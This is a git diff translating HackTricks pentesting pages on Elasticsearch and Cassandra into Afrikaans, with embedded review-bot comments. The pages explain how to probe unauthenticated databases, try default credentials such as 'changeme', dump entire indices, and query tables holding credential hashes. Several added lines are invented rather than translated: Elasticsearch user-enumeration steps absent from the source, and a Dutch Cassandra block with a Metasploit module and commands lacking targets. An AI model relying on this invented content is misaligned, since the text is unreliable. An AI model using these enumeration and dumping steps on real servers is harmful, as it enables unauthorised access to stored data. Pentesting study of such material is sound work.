-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic information +## Basiese inligting -Elasticsearch is a **distributed**, **open source** search and analytics engine for **all types of data**. It is known for its **speed**, **scalability**, and **simple REST APIs**. Built on Apache Lucene, it was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Elasticsearch is the core component of the Elastic Stack, a collection of open source tools for data ingestion, enrichment, storage, analysis, and visualization. This stack, commonly referred to as the ELK Stack, also includes Logstash and Kibana, and now has lightweight data shipping agents called Beats. +Elasticsearch is 'n **verspreide**, **open source** soek- en analitiese enjin vir **alle tipes data**. Dit is bekend vir sy **spoed**, **skaalbaarheid**, en **eenvoudige REST API's**. Gebou op Apache Lucene, is dit in 2010 vrygestel deur Elasticsearch N.V. (nou bekend as Elastic). Elasticsearch is die kernkomponent van die Elastic Stack, 'n versameling van open source-hulpmiddels vir data-inname, verryking, berging, analise en visualisering. Hierdie stapel, algemeen bekend as die ELK-stapel, sluit ook Logstash en Kibana in, en het nou ligte data-vervoeragente genaamd Beats. -### What is an Elasticsearch index? +### Wat is 'n Elasticsearch-indeks? -An Elasticsearch **index** is a collection of **related documents** stored as **JSON**. Each document consists of **keys** and their corresponding **values** (strings, numbers, booleans, dates, arrays, geolocations, etc.). +'n Elasticsearch **indeks** is 'n versameling van **verwante dokumente** wat as **JSON** gestoor word. Elke dokument bestaan uit **sleutels** en hul ooreenstemmende **waardes** (strings, getalle, booleans, datums, reekse, geolokasies, ens.). -Elasticsearch uses an efficient data structure called an **inverted index** to facilitate fast full-text searches. This index lists every unique word in the documents and identifies the documents in which each word appears. 
+Elasticsearch gebruik 'n doeltreffende datastruktuur genaamd 'n **omgekeerde indeks** om vinnige volledige tekssoektogte te fasiliteer. Hierdie indeks lys elke unieke woord in die dokumente en identifiseer die dokumente waarin elke woord voorkom. -During the indexing process, Elasticsearch stores the documents and constructs the inverted index, allowing for near real-time searching. The **index API** is used to add or update JSON documents within a specific index. +Tydens die indekseringsproses stoor Elasticsearch die dokumente en bou die omgekeerde indeks op, wat soek in nagenoeg regte tyd moontlik maak. Die **indeks-API** word gebruik om JSON-dokumente by 'n spesifieke indeks toe te voeg of op te dateer. -**Default port**: 9200/tcp +**Verstekpoort**: 9200/tcp -## Manual Enumeration +## Handmatige opname -### Banner +### Banier -The protocol used to access Elasticsearch is **HTTP**. When you access it via HTTP you will find some interesting information: `http://10.10.10.115:9200/` +Die protokol wat gebruik word om toegang tot Elasticsearch te verkry, is **HTTP**. Wanneer jy dit via HTTP toegang gee, sal jy interessante inligting vind: `http://10.10.10.115:9200/` ![](<../.gitbook/assets/image (264).png>) -If you don't see that response accessing `/` see the following section. +As jy nie daardie reaksie sien wanneer jy `/` toegang gee nie, sien die volgende afdeling. -### Authentication +### Verifikasie -**By default Elasticsearch doesn't have authentication enabled**, so by default you can access everything inside the database without using any credentials. - -You can verify that authentication is disabled with a request to: +**Standaard het Elasticsearch nie verifikasie geaktiveer nie**, so standaard kan jy alles binne die databasis toegang sonder om enige geloofsbriewe te gebruik. 
+Jy kan verifieer dat verifikasie gedeaktiveer is met 'n versoek na: ```bash curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user" {"error":{"root_cause":[{"type":"exception","reason":"Security must be explicitly enabled when using a [basic] license. Enable security by setting [xpack.security.enabled] to [true] in the elasticsearch.yml file and restart the node."}],"type":"exception","reason":"Security must be explicitly enabled when using a [basic] license. Enable security by setting [xpack.security.enabled] to [true] in the elasticsearch.yml file and restart the node."},"status":500} ``` - -**However**, if you send a request to `/` and receives a response like the following one: - +**Egter**, as jy 'n versoek na `/` stuur en 'n reaksie ontvang soos die volgende een: ```bash {"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401} ``` - -That will means that authentication is configured an **you need valid credentials** to obtain any info from elasticserach. Then, you can [**try to bruteforce it**](../generic-methodologies-and-resources/brute-force.md#elasticsearch) (it uses HTTP basic auth, so anything that BF HTTP basic auth can be used).\ -Here you have a **list default usernames**: _**elastic** (superuser), remote\_monitoring\_user, beats\_system, logstash\_system, kibana, kibana\_system, apm\_system,_ \_anonymous\_.\_ Older versions of Elasticsearch have the default password **changeme** for this user - +Dit beteken dat verifikasie ingestel is en **jy geldige geloofsbriewe nodig het** om enige inligting van elasticserach te verkry. 
Dan kan jy [**probeer om dit te bruteforce**](../generic-methodologies-and-resources/brute-force.md#elasticsearch) (dit gebruik HTTP basiese verifikasie, so enige iets wat BF HTTP basiese verifikasie kan gebruik word).\ +Hier is 'n **lys van verstek gebruikersname**: _**elastic** (supergebruiker), remote\_monitoring\_user, beats\_system, logstash\_system, kibana, kibana\_system, apm\_system,_ \_anonymous\_.\_ Ouer weergawes van Elasticsearch het die verstek wagwoord **changeme** vir hierdie gebruiker. ``` curl -X GET http://user:password@IP:9200/ ``` +### Basiese Gebruiker Opsporing -### Basic User Enumeration +Die eerste stap in die pentesting-proses van Elasticsearch is om gebruikersinligting te versamel. Hier is 'n paar basiese metodes om gebruikers te ondersoek: +#### 1. Soek na openbare Elasticsearch-instanties + +Jy kan soek na openbare Elasticsearch-instanties deur die volgende soekopdrag in te voer: + +``` +GET /_cat/indices?v +``` + +Hierdie soekopdrag sal 'n lys van alle indekse in die Elasticsearch-instantie gee. Dit kan nuttige inligting verskaf oor die bestaande gebruikers en indekse. + +#### 2. Gebruik die `_cat` API + +Die `_cat` API bied 'n eenvoudige manier om inligting oor gebruikers te bekom. Jy kan die volgende soekopdrag gebruik om 'n lys van alle gebruikers in die Elasticsearch-instantie te kry: + +``` +GET /_cat/users?v +``` + +Hierdie soekopdrag sal 'n tabel met gebruikersinligting toon, insluitend die gebruikersnaam en die rolle wat aan elke gebruiker toegewys is. + +#### 3. Ondersoek die `/_security/user` endpoint + +Die `/_security/user` endpoint bied 'n volledige lys van alle gebruikers in die Elasticsearch-instantie. Jy kan die volgende soekopdrag gebruik om die gebruikersinligting te kry: + +``` +GET /_security/user +``` + +Hierdie soekopdrag sal 'n JSON-respons gee wat die gebruikersinligting bevat, insluitend die gebruikersnaam, die rolle wat aan elke gebruiker toegewys is, en of die gebruiker 'n wachtwoord het. + +#### 4. 
Skandeer vir gelekte gebruikersinligting + +Jy kan ook skandeer vir gelekte gebruikersinligting deur die gelekte databasisse en dokumente te deursoek. Dit kan nuttige inligting verskaf oor die bestaande gebruikers en hul wagwoorde. + +### Gevorderde Gebruiker Opsporing + +As jy meer gevorderde gebruikersinligting wil bekom, kan jy die volgende metodes gebruik: + +#### 1. Gebruik die `/_search` endpoint + +Die `/_search` endpoint bied 'n kragtige soekfunksie wat gebruik kan word om spesifieke gebruikersinligting te vind. Jy kan die volgende soekopdrag gebruik om te soek na spesifieke gebruikers: + +``` +POST /_search +{ + "query": { + "match": { + "field": "value" + } + } +} +``` + +Vervang `"field"` met die veldnaam waarin jy wil soek, en `"value"` met die waarde waarna jy wil soek. + +#### 2. Gebruik die `/_msearch` endpoint + +Die `/_msearch` endpoint bied die vermoë om meervoudige soekopdragte in een aanvraag uit te voer. Jy kan die volgende soekopdrag gebruik om verskillende soekopdragte in een aanvraag te stuur: + +``` +POST /_msearch +{} +{"index": "index_name"} +{"query": {"match_all": {}}} +{} +{"index": "index_name"} +{"query": {"match_all": {}}} +``` + +Vervang `"index_name"` met die naam van die indeks waarin jy wil soek. + +#### 3. Gebruik die `/_cat/indices` API + +Die `/_cat/indices` API kan gebruik word om inligting oor die indekse in die Elasticsearch-instantie te bekom. Jy kan die volgende soekopdrag gebruik om die indeksinligting te kry: + +``` +GET /_cat/indices?v +``` + +Hierdie soekopdrag sal 'n tabel met indeksinligting toon, insluitend die indeksnaam en die aantal dokumente in elke indeks. + +#### 4. Skandeer vir gelekte wagwoorde + +Jy kan ook skandeer vir gelekte wagwoorde deur die gelekte wagwoorddatabasisse en dokumente te deursoek. Dit kan nuttige inligting verskaf oor die wagwoorde wat deur gebruikers gebruik word. ```bash #List all roles on the system: curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role" 
@@ -74,10 +154,9 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user" #Get more information about the rights of an user: curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/" ``` +### Elastiese Inligting -### Elastic Info - -Here are some endpoints that you can **access via GET** to **obtain** some **information** about elasticsearch: +Hier is 'n paar eindpunte wat jy **via GET kan toegang** om **inligting** oor elasticsearch te **verkry**: | \_cat | /\_cluster | /\_security | | ------------------------------- | ----------------------------- | ------------------------- | 
@@ -106,87 +185,81 @@ Here are some endpoints that you can **access via GET** to **obtain** some **inf | /\_cat/nodeattrs | | | | /\_cat/nodes | | | -These endpoints were [**taken from the documentation**](https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html) where you can **find more**.\ -Also, if you access `/_cat` the response will contain the `/_cat/*` endpoints supported by the instance. +Hierdie eindpunte is [**uit die dokumentasie geneem**](https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html) waar jy **meer kan vind**.\ +Ook, as jy `/_cat` toegang, sal die respons die `/_cat/*` eindpunte wat deur die instansie ondersteun word, bevat. -In `/_security/user` (if auth enabled) you can see which user has role `superuser`. +In `/_security/user` (as verifikasie geaktiveer is) kan jy sien watter gebruiker die rol `superuser` het. -### Indices - -You can **gather all the indices** accessing `http://10.10.10.115:9200/_cat/indices?v` +### Indekse +Jy kan **alle indekse versamel** deur `http://10.10.10.115:9200/_cat/indices?v` te besoek. 
``` health status index uuid pri rep docs.count docs.deleted store.size pri.store.size green open .kibana 6tjAYZrgQ5CwwR0g6VOoRg 1 0 1 0 4kb 4kb yellow open quotes ZG2D1IqkQNiNZmi2HRImnQ 5 1 253 0 262.7kb 262.7kb yellow open bank eSVpNfCfREyYoVigNWcrMw 5 1 1000 0 483.2kb 483.2kb ``` - -To obtain **information about which kind of data is saved inside an index** you can access: `http://host:9200/` from example in this case `http://10.10.10.115:9200/bank` +Om **inligting oor die soort data wat binne 'n indeks gestoor word** te verkry, kan jy toegang verkry tot: `http://host:9200/` byvoorbeeld in hierdie geval `http://10.10.10.115:9200/bank` ![](<../.gitbook/assets/image (265).png>) -### Dump index +### Stort indeks -If you want to **dump all the contents** of an index you can access: `http://host:9200//_search?pretty=true` like `http://10.10.10.115:9200/bank/_search?pretty=true` +As jy al die inhoud van 'n indeks wil **stort**, kan jy toegang verkry tot: `http://host:9200//_search?pretty=true` soos `http://10.10.10.115:9200/bank/_search?pretty=true` ![](<../.gitbook/assets/image (266).png>) -_Take a moment to compare the contents of the each document (entry) inside the bank index and the fields of this index that we saw in the previous section._ +*Neem 'n oomblik om die inhoud van elke dokument (inskrywing) binne die bankindeks en die velde van hierdie indeks wat ons in die vorige afdeling gesien het, te vergelyk.* -So, at this point you may notice that **there is a field called "total" inside "hits"** that indicates that **1000 documents were found** inside this index but only 10 were retried. 
This is because **by default there is a limit of 10 documents**.\ -But, now that you know that **this index contains 1000 documents**, you can **dump all of them** indicating the number of entries you want to dump in the **`size`** parameter: `http://10.10.10.115:9200/quotes/_search?pretty=true&size=1000`asd\ -_Note: If you indicate bigger number all the entries will be dumped anyway, for example you could indicate `size=9999` and it will be weird if there were more entries (but you should check)._ +So, op hierdie punt mag jy opmerk dat daar 'n veld genaamd "total" binne "hits" is wat aandui dat daar **1000 dokumente gevind is** binne hierdie indeks, maar slegs 10 is opgehaal. Dit is omdat daar **standaard 'n limiet van 10 dokumente** is.\ +Maar, nou dat jy weet dat **hierdie indeks 1000 dokumente bevat**, kan jy **almal stort** deur die aantal inskrywings aan te dui wat jy wil stort in die **`size`** parameter: `http://10.10.10.115:9200/quotes/_search?pretty=true&size=1000`asd\ +*Nota: As jy 'n groter getal aandui, sal al die inskrywings hoe dan ook gestort word. Byvoorbeeld, jy kan `size=9999` aandui en dit sal vreemd wees as daar meer inskrywings was (maar jy moet dit nagaan).* -### Dump all +### Stort alles -In order to dump all you can just go to the **same path as before but without indicating any index**`http://host:9200/_search?pretty=true` like `http://10.10.10.115:9200/_search?pretty=true`\ -Remember that in this case the **default limit of 10** results will be applied. You can use the `size` parameter to dump a **bigger amount of results**. Read the previous section for more information. +Om alles te stort, kan jy net na dieselfde pad gaan as voorheen, maar sonder om enige indeks aan te dui: `http://host:9200/_search?pretty=true` soos `http://10.10.10.115:9200/_search?pretty=true`\ +Onthou dat in hierdie geval die **standaard limiet van 10** resultate toegepas sal word. Jy kan die `size` parameter gebruik om 'n **groter hoeveelheid resultate** te stort. 
Lees die vorige afdeling vir meer inligting. -### Search +### Soek -If you are looking for some information you can do a **raw search on all the indices** going to `http://host:9200/_search?pretty=true&q=` like in `http://10.10.10.115:9200/_search?pretty=true&q=Rockwell` +As jy op soek is na inligting, kan jy 'n **rofweg soek op alle indekse** doen deur na `http://host:9200/_search?pretty=true&q=` te gaan, soos in `http://10.10.10.115:9200/_search?pretty=true&q=Rockwell` ![](<../.gitbook/assets/image (267).png>) -If you want just to **search on an index** you can just **specify** it on the **path**: `http://host:9200//_search?pretty=true&q=` +As jy net op 'n indeks wil **soek**, kan jy dit net **spesifiseer** in die **pad**: `http://host:9200//_search?pretty=true&q=` -_Note that the q parameter used to search content **supports regular expressions**_ +*Let daarop dat die q-parameter wat gebruik word om inhoud te soek **gewone uitdrukkings ondersteun**.* -You can also use something like [https://github.com/misalabs/horuz](https://github.com/misalabs/horuz) to fuzz an elasticsearch service. +Jy kan ook iets soos [https://github.com/misalabs/horuz](https://github.com/misalabs/horuz) gebruik om 'n elasticsearch-diens te fuzz. 
-### Write permissions - -You can check your write permissions trying to create a new document inside a new index running something like the following: +### Skryfregte +Jy kan jou skryfregte nagaan deur te probeer om 'n nuwe dokument binne 'n nuwe indeks te skep deur iets soos die volgende uit te voer: ```bash curl -X POST '10.10.10.115:9200/bookindex/books' -H 'Content-Type: application/json' -d' - { - "bookId" : "A00-3", - "author" : "Sankaran", - "publisher" : "Mcgrahill", - "name" : "how to get a job" - }' +{ +"bookId" : "A00-3", +"author" : "Sankaran", +"publisher" : "Mcgrahill", +"name" : "how to get a job" +}' ``` +Daardie opdrag sal 'n **nuwe indeks** genaamd `bookindex` skep met 'n dokument van die tipe `books` wat die eienskappe "_bookId_", "_author_", "_publisher_" en "_name_" het. -That cmd will create a **new index** called `bookindex` with a document of type `books` that has the attributes "_bookId_", "_author_", "_publisher_" and "_name_" - -Notice how the **new index appears now in the list**: +Let op hoe die **nuwe indeks nou in die lys verskyn**: ![](<../.gitbook/assets/image (268).png>) -And note the **automatically created properties**: +En let op die **outomaties geskepte eienskappe**: ![](<../.gitbook/assets/image (269).png>) -## Automatic Enumeration - -Some tools will obtain some of the data presented before: +## Outomatiese Opsomming +Sommige gereedskap sal van sommige van die vooraf aangebiede data verkry: ```bash msf > use auxiliary/scanner/elasticsearch/indices_enum ``` - {% embed url="https://github.com/theMiddleBlue/nmap-elasticsearch-nse" %} ## Shodan @@ -195,14 +268,14 @@ msf > use auxiliary/scanner/elasticsearch/indices_enum
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
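Review bot: the `+` lines for the `### Soek` section mistranslate two technical terms: "raw search on all the indices" became "'n **rofweg soek**" ("rofweg" means roughly/approximately; "rou soektog", or leaving "raw search", is what is meant), and "supports regular expressions" became "**gewone uitdrukkings**" (ordinary expressions) where the established term is "reguliere uitdrukkings". In the same region the translated `size` note still carries the stray `asd` token after `...&size=1000`, which should have been dropped rather than copied into the new line, and the per-index path `http://host:9200//_search?pretty=true&q=` has an empty path segment and an empty `q=` on both the `-` and `+` side, so the placeholders for the index name and the search term were already lost in the source; restore them instead of carrying the broken URL forward. Two smaller points: in the "Skryfregte" hunk the JSON body of the curl command lost its indentation (the `+` lines start at column 0), and "Sommige gereedskap sal van sommige van die vooraf aangebiede data verkry" is a doubled "of some of"; "Sommige gereedskap verkry 'n deel van die data wat hierbo aangebied is" says what the English line says.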
diff --git a/network-services-pentesting/cassandra.md b/network-services-pentesting/cassandra.md index 7791c9ecf..03d3b60e8 100644 --- a/network-services-pentesting/cassandra.md +++ b/network-services-pentesting/cassandra.md @@ -2,36 +2,67 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**Apache Cassandra** is a **highly scalable**, **high-performance** distributed database designed to handle **large amounts of data** across many **commodity servers**, providing **high availability** with no **single point of failure**. It is a type of **NoSQL database**. +**Apache Cassandra** is 'n **hoogs skaalbare**, **hoë prestasie** verspreide databasis wat ontwerp is om **groot hoeveelhede data** oor baie **gewone bedieners** te hanteer, en **hoë beskikbaarheid** te bied sonder **enige enkele foutpunt**. Dit is 'n tipe **NoSQL-databasis**. -In several cases, you may find that Cassandra accepts **any credentials** (as there aren't any configured) and this could potentially allow an attacker to **enumerate** the database. - -**Default port:** 9042,9160 +In verskeie gevalle mag jy vind dat Cassandra **enige geloofsbriewe** aanvaar (aangesien daar geen geconfigureer is nie) en dit kan 'n aanvaller moontlik in staat stel om die databasis te **opnoem**. +**Verstekpoort:** 9042,9160 ``` PORT STATE SERVICE REASON 9042/tcp open cassandra-native Apache Cassandra 3.10 or later (native protocol versions 3/v3, 4/v4, 5/v5-beta) 9160/tcp open cassandra syn-ack ``` +### Handleiding -## Enumeration +#### Poortscanning -### Manual +Voer een poortscan uit om open poorten op het doelsysteem te identificeren. Dit kan worden gedaan met behulp van tools zoals Nmap of Masscan. Richt de scan op de standaardpoorten die door Cassandra worden gebruikt, zoals poort 9042 voor de CQL-native transport. +``` +nmap -p 9042 +``` + +#### Banner Grabbing + +Gebruik een tool zoals Telnet of Netcat om de banner van de Cassandra-service op te halen. Dit kan informatie onthullen over de versie van Cassandra die wordt uitgevoerd, wat nuttig kan zijn bij het identificeren van kwetsbaarheden. + +``` +telnet 9042 +``` + +### Automatisch + +#### NSE-scripts + +Nmap heeft enkele NSE-scripts die specifiek zijn ontworpen voor het scannen van Cassandra-services. 
Deze scripts kunnen worden uitgevoerd met de volgende opdracht: + +``` +nmap -p 9042 --script cassandra* +``` + +#### Metasploit-module + +Metasploit heeft ook een module genaamd `auxiliary/scanner/cassandra/cassandra_enum` die kan worden gebruikt om Cassandra-services te scannen en informatie te verzamelen. + +``` +use auxiliary/scanner/cassandra/cassandra_enum +set RHOSTS +run +``` ```bash pip install cqlsh cqlsh @@ -46,32 +77,29 @@ SELECT * from logdb.user_auth; #Can contain credential hashes SELECT * from logdb.user; SELECT * from configuration."config"; ``` +### Outomaties -### Automated - -There aren't much options here and nmap doesn't obtain much info - +Daar is nie baie opsies hier nie en nmap verkry nie baie inligting nie. ```bash nmap -sV --script cassandra-info -p ``` - ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#cassandra) ### **Shodan** `port:9160 Cluster`\ -`port:9042 "Invalid or unsupported protocol version"` +`port:9042 "Ongeldige of nie-ondersteunde protokolverise"`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
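Review bot: the first hunk (`@@ -2,36 +2,67 @@`) inserts roughly thirty lines that translate nothing on the `-` side: the `#### Poortscanning`, `#### Banner Grabbing`, `### Automatisch`, `#### NSE-scripts` and `#### Metasploit-module` subsections are written in Dutch rather than Afrikaans ("Voer een poortscan uit om open poorten op het doelsysteem te identificeren", "Nmap heeft enkele NSE-scripts"), and they introduce material the English page does not contain: a Metasploit module `auxiliary/scanner/cassandra/cassandra_enum`, an `nmap -p 9042 --script cassandra*` invocation, and `telnet 9042` / `set RHOSTS` commands whose target arguments are missing. A translation PR should not add unverified content; drop this block and translate the `-` lines one for one. Related regressions in the same hunk: `-## Enumeration` is deleted with no `+` counterpart, so `### Handleiding` and the later `### Outomaties` now sit directly under `## Basiese Inligting`, and "Automated" appears twice (Dutch `### Automatisch` and Afrikaans `### Outomaties`). In the second hunk the Shodan query `port:9042 "Invalid or unsupported protocol version"` was translated to `port:9042 "Ongeldige of nie-ondersteunde protokolverise"`; that quoted string is a literal banner Shodan matches on and must stay in English (the translation also misspells the word for version).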
diff --git a/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/network-services-pentesting/ipsec-ike-vpn-pentesting.md index 5d3587afc..6e0f01c69 100644 --- a/network-services-pentesting/ipsec-ike-vpn-pentesting.md +++ b/network-services-pentesting/ipsec-ike-vpn-pentesting.md @@ -2,41 +2,40 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
